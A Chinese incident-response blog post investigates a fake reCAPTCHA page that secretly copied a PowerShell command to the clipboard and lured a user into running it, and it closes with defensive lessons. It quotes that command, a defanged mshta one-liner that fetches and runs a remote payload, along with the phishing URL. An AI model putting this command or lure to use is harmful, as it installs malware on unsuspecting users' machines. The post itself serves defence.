之前在TG群里偶尔看到过利用reCAPTCHA钓鱼的文章,也没怎么关注,没想到今天在实际环境刚好遇到了,费了一番功夫才还原整个攻击过程。
下面将基于事件响应流程,分享下整个调查过程,希望通过这篇文章,能为大家提供一些思路,帮助更好地理解和防范这种类型的攻击。
这里我们就直接从Identification阶段开始介绍,准备阶段涉及的内容比较多,涉及整个安全能力的建设,超出了本文的范围,大家如果需要,可以参考其他的资料。
在日常的安全事件的调查分析过程,发现MDE有个事件比较可疑:
第一反应还以为是有人在做渗透测试或者红队项目,但是因为操作比较敏感,先将主机使用MDE的Isolate (隔离)功能进行隔离,再进一步调查。
因为操作比较敏感,直接企微联系用户,确认是否是用户在测试。和用户确认后,用户都不知道powershell,渗透测试,红队是什么意思。所以可以确认是真实攻击。
询问用户在告警时间点前是否下载或者执行过什么文件,用户确认没有,只是反映说在那个时间点做了一个人机识别,但因为用户不懂技术,无法提供进一步的详细信息。
既然确认了是真实的攻击,就需要采取必要的遏制动作,避免事态进一步恶化。
-
首先是需要将受影响主机断开网络连接,其实之前已经做了
-
修改用户的账号密码
-
对Powershell命令里面涉及的域名进行封禁
这里我们需要考虑遏制动作带来的影响。如果攻击者已经在网络中驻留了比较长的时间,且可能存在不止一个驻留点。那我们的遏制操作可能会让攻击者意识到自己已经被发现,从而会立即采取一些行动,比如立即部署勒索软件,或者窃取敏感数据,或者执行一些破坏性的操作。所以大家在事件响应过程,每一个动作或者决策,都应该基于对已经收集的信息综合全面地分析和评估后,在确定下一步的动作。
因为这里我们已经经过初步调查和分析,判断是一个单点事件,且发现比较及时,所以可以立即采取必要的遏制动作。
要进行根除,我们需要确认攻击是如何发生的,攻击者的意图是什么,攻击成功后,做了哪些操作。
我们首先调查攻击是如何发生的。因为从用户访谈得知,当时在搜索一些素材,且没有下载和执行任何文件,而且MDE时间线也没有发现有可疑文件落地,整个进程链显示是用户在桌面运行了PowerShell执行了恶意指令。
所以初步调查思路是不是用户访问的网站提示用户执行什么操作,然后用户无意中执行了PowerShell命令。
先对MDE的时间线进行分析,发现没有可疑的网络请求。
因为当前环境所有用户上网都会经过Proxy,所以对该用户在事件发生时间点前后的网络访问日志进行分析。在对日志进行分析和过滤后,发现了几条比较可疑对记录:
刚开始想着把里面的域名全部导出来,在微步批量碰撞,但是没有发现可疑的记录。
所以接下来我们就对这些URL一个一个手动访问,这里也遇到了一个坑。最初是从最早的URL开始访问,但是访问了几个后,都没发现问题,就有点怀疑思路是否正确,因为这里已经过滤掉了很多,如果全部都手动访问,需要花费很长的时间。最后才想到从下载Powershell代码的域名开始,再往前一个一访问,很快就找到了用户访问的钓鱼页面:
访问钓鱼页面hxxps[:]//myroboex[.]online/6756cea04d0f7f006f4d141f后,会跳转到托在合法网站上面的一个人机验证的界面:
当点击I'm not a robot进行验证时,会将Powershell命令在后台复制到剪贴板,并提示用户执行一些列操作(实际是复制剪贴板里面的PowerShell命令并运行):
实际执行的PowerShell命令:
powershell . *i*\\\\\\\\\*2msh*e hxxps[:]//poxile[.]shop/tozoplaying.m4a # ''Ι am nοt a rοbοt: гeСАРТСНА Verification ID: 62107
在上面的PowerShell命令执行后,就会执行后续的Payload,并创建启动项,具体大家有兴趣的可以对上面的脚本进行调式,分析下详细的行为。
通过威胁情报搜索,发现这个行为和CoralRaider 威胁活动者有关,但这次的初始攻击向量和之前这些文章里面提到的稍有差异:
-
https://blog.talosintelligence.com/coralraider-targets-socialmedia-accounts/
-
https://www.bleepingcomputer.com/news/security/coralraider-attacks-use-cdn-cache-to-push-info-stealer-malware/
-
https://blog.talosintelligence.com/suspected-coralraider-continues-to-expand-victimology-using-three-information-stealers/
在还原了攻击过程后,因为经过初步分析,发现PowerShell命令执行后,被AMSI拦截,所以没造成进一步的影响。接下来,需要:
-
删除脚本执行过程创建的自启动项和脚本
-
执行Windows defender full scan和离线扫描
-
如果想将风险降到最低,重新安装受影响主机的系统。
因为本次事件并没有造成进一步的影响,所以在根除阶段完成后,解锁用户电脑,并对这台电脑观察一段时间,看是否存在可疑行为。
当然,如前面所述,如果希望将风险降到最低,可以重装受影响主机的系统。
-
不管安全意识如何宣传,但是总会有用户上当受骗,所以技术控制还是很重要。
-
网络安全监控(NSM)和终端安全监控(CSM)同样重要。虽然MDE目前是比较优秀的EDR解决方案(可以说很强),终端侧的活动基本都能记录到,但是在网络侧的记录还是稍有缺失。
-
在SOC建设过程,对企业网络的可见性至关重要,有哪些资产,资产的属性及重要程度,不同的资产,需要接入哪些日志,如何存储和检索相关的日志,都需要针对性地提供解决方案。不知道国内的SOC现在怎么做的,但如果是以前的仅靠态势感知,那对终端的可见性是比较低的,事件调查,将很大程度依赖于终端的取证分析了。
-
事件分析和调查,分析师的经验和直觉是比较重要,但也要注意认知偏见和思维定式。
总之,不要相信安全意识宣传后,用户就能识别所有的社会工程学攻击,一定要有技术控制。另外,在目前阶段,安全产品是否能够和AI深度融合,对多数企业来说,价值并不是很大,重要的是把网络侧监控(NSM)和终端侧监控(CSM)做好。
现在很多安全产品都在宣传和DeepSeek深度集成,但还是希望能够解决下比较朴实无华的问题,比如查一周的日志,需要十几分钟的问题(splunk几秒😎)。
IoC就不写了,变化太快了。。。大家要是有好的检测和防御思路,欢迎留言沟通交流。
原文始发于微信公众号(Desync InfoSec):reCAPTCHA Phishing: Ι Am Nοt A Rοbοt, Are You?
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论